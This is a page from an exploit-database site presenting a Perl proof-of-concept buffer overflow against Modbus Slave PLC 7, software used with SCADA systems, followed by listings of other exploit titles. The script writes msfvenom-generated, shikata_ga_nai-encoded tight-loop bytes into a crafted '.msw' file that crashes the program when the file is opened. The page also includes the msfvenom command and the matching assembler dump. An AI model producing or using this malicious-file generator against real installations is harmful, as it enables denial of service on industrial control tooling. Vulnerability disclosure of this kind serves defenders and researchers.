Menu

Search for hundreds of thousands of exploits

"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)"

Author

Exploit author

"Kağan Çapar"

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-10-29

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-27
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Vendor Homepage : https://www.modbustools.com
# Tested Version: 7
# Tested on OS: Windows XP SP3 *ENG
# other version should be affected
# About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!. 
# Speed up your PLC programming with this simulating tools.  Used for SCADA systems.
# Modbus is a serial communications protocol originally published by Schneider Electric
# Steps to Reproduce: Run the perl exploit script, it will create a new
# file with the name "exploit.msw" and Drag on to "mbslave.exe"
# you will see a loop and crash on software
# Greetz : cwd-onkan-badko-key-akkus

# ! /usr/bin/perl

# Dump of assembler code for function loop:
# 0x0000555555558030 <+0>:	mov    $0x1e3b563c,%ebx
# 0x0000555555558035 <+5>:	fld    %st(4)
# 0x0000555555558037 <+7>:	fnstenv -0xc(%rsp)
# 0x000055555555803b <+11>:	pop    %rax
# 0x000055555555803c <+12>:	sub    %ecx,%ecx
# 0x000055555555803e <+14>:	mov    $0x1,%cl
# 0x0000555555558040 <+16>:	xor    %ebx,0x14(%rax)
# 0x0000555555558043 <+19>:	add    $0x4,%eax
# 0x0000555555558046 <+22>:	add    0x10(%rax),%ebx
# 0x0000555555558049 <+25>:	fisubs 0xe0d0(%rbx)

# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
# print /x &loop
# $1 = 0x555555558030

open(code, ">exploit.msw");
binmode(code);
$loop = 
"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
"\xe0";

print code $loop;
close(code);
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-19 "Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free" remote windows_x86 0xeb-bp
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
Release Date Title Type Platform Author
2019-02-20 "WinRAR 5.61 - '.lng' Denial of Service" dos windows "Kağan Çapar"
2018-11-19 "HTML Video Player 1.2.5 - Buffer-Overflow (SEH)" local windows_x86 "Kağan Çapar"
2018-10-29 "Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)" local windows_x86 "Kağan Çapar"
2018-10-22 "Audacity 2.3 - Denial of Service (PoC)" dos windows "Kağan Çapar"
2018-10-10 "FileZilla 3.33 - Buffer Overflow (PoC)" dos linux "Kağan Çapar"
2018-05-31 "PHP Dashboards NEW 5.5 - 'email' SQL Injection" webapps php "Kağan Çapar"
2018-05-31 "New STAR 2.1 - SQL Injection / Cross-Site Scripting" webapps php "Kağan Çapar"
2018-05-31 "Grid Pro Big Data 1.0 - SQL Injection" webapps php "Kağan Çapar"
2018-05-31 "CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting" webapps php "Kağan Çapar" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected